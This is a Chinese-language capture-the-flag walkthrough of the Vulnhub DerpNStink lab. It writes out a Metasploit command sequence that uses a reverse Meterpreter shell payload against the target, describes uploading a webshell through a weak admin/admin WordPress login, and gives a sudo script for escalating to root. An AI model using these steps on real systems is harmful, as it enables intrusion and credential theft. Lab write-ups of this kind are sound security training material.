文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

Vulnhub:Derpnstink靶机渗透

2023-09-07 12:45

关注

攻击机kali:192.168.56.108

靶机derpnstink:192.168.56.114

 

扫描同网段下存活主机

fc9d3b282e794334ab2fd7d1aa8535de.png

扫描服务版本信息

9d75e0ff8d714801afeac4ca216feecb.png

 

开启了21、22、80端口,分别对应着ftp、ssh、http服务,打开浏览器进行访问

db94c83955dc4c6085dfdb6f7880ede8.png

 

查看源代码发现flag1和info.txt

9a3583d398ef42a89f89a29ea4297acd.png

 点开info.txt

d2588d87a0ea475e84a5c523b6beb0e6.png

这个的意思就是要让我们在本地添加一个dns解析,先不管 因为还不知道具体要添加的东西

接着使用工具扫描网站目录,发现了robots.txt文件,weblog目录下存在登录页面,php目录下有phpmyadmin,都访问看看有什么有用的信息,太多了这里就不一一列出了

cf099bf3d4d84c9fb112ba23db17f818.png

进行访问的时候会发现weblog目录下的都打不开

12974d2f410f484fb904c4adb0e4c57e.png

刚好前面也拿到提示说要在本地添加一个dns记录,

Linux系统在/etc/hosts文件中进行添加

525202606abf4ef29c3e0aa5da51eb60.png

添加了之后就可以正常访问了,访问刚刚扫目录得到的登录页面,

3b3637aba9b2473387829eb1106c6985.png

很明显是一个wordpress的网站

使用awvs扫描网站发现存在弱口令admin/admin

a60a9fda753749b6b6624801cf84cfab.png

 登录到刚刚的网站

3254efea72d047faa8d3f1295ed6e82e.png

 

登录成功后在slideshow的manage slides的add new发现可以上传文件,二话不说直接传个马然后蚁剑连接

cc07c6c1e1b043db87fdf440add63677.png

查找配置文件并查看,拿到数据库的用户名和密码

27c8bad5f803427e91e92f6ebcc746b1.png

获取数据库用户名和密码的第二种方法:

使用wpscan对wordpress网站进行扫描

d54e94bd3a294bbe8402ae3ee54dc3a2.png

发现这个插件存在漏洞,进入msf查看有没有可以利用的模块

b08bb28290874c29ab7f504c8186baae.png

发现存在可以利用的模块,直接一把梭拿shell

use 1set payload php/meterpreter/reverse_tcpset rhosts 192.168.56.114set lhost 192.168.56.108set targeturi /weblogset wp_user adminset wp_password admin

 

78e3a35389aa4f58a6b956a7d44ab7da.png

shell,进入一个交互式的shell,然后查看配置文件cat /var/www/html/weblog/wp-config.php

d171a2308263474b8053bea6c7e8e20b.png

发现了数据库的账号密码,而前面找到的phpmyadmin页面就是一个mysql数据库管理页面,进行登录,登录成功后经过一番寻找发现了flag2

165ad58b55f54f5f9ca49245f34793c3.png

同时还发现了另外一个账号密码

e7f222aaeeda42159542c05af47260c5.png

将密码的哈希值保存到一个文件里,然后用john进行解密

47a170fad8f24a8ca9f76bd6ce05ded4.png

 639db01fc76c46b4ae6e7503b174fb5b.png

得到密码为wedgie57,同时在班级home目录下发现了两个用户:mrderp,stinky

尝试切换到stinky用户,密码使用刚刚破解得到的wedgie57

dd40ceef6add4d4bb81080ae761135cc.png

成功切换到stinky用户,进入到stinky目录并查看当前目录的所有文件

03775676e1eb42a2b9e083664ac12e07.png

在Desktop目录发现了flag3

04b360376f7744388a4d307fa50f36c1.png

在Documents目录发现了一个derpissues.pcap数据包文件,但是发现无法将其下载到本地,可以先将其复制到tmp目录下,然后在蚁剑拿到的shell中将其进行下载,下载之后用wireshark打开进行分析,过滤,发现了mrderp的登录密码

4a16384b6366468b8bb45d58adacf6fb.png

在shell里切换登录到mrderp,发现不可行

d2f97a33c0e242559a12b028b1ccdeb4.png

接着尝试使用ssh进行远程连接

d66f68a3fe6f4aa4ba06c791a8ec0983.png

连接成功,并在Desktop目录下发现了一个日志文件

6a1e4befe6154700bb44defacc218c59.png

打开后发现是个聊天记录,要我们访问https://pastebin.com/RzK9WfGw

4a85c8fa1c824be1829fa77000eb72e5.png

9dd56ee66f984a48af6d63a545c90e95.png

根据该信息的提示,使用二进制提权。先创建一个binaries文件夹,进入到binaries文件夹将/bin/bash写入到derpy.sh文件中并赋予其权限,然后使用sudo命令运行该文件就成功提权为root权限了

mkdir binariescd binariesecho “/bin/bash” >> derpy.shchmod +x derpy.shsudo ./derpy.sh

 

a9322fd9b9834825ab6b74b255616919.png

最后在root目录下的Desktop目录找到最后一个flag

 

来源地址:https://blog.csdn.net/m0_62008601/article/details/128443253

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯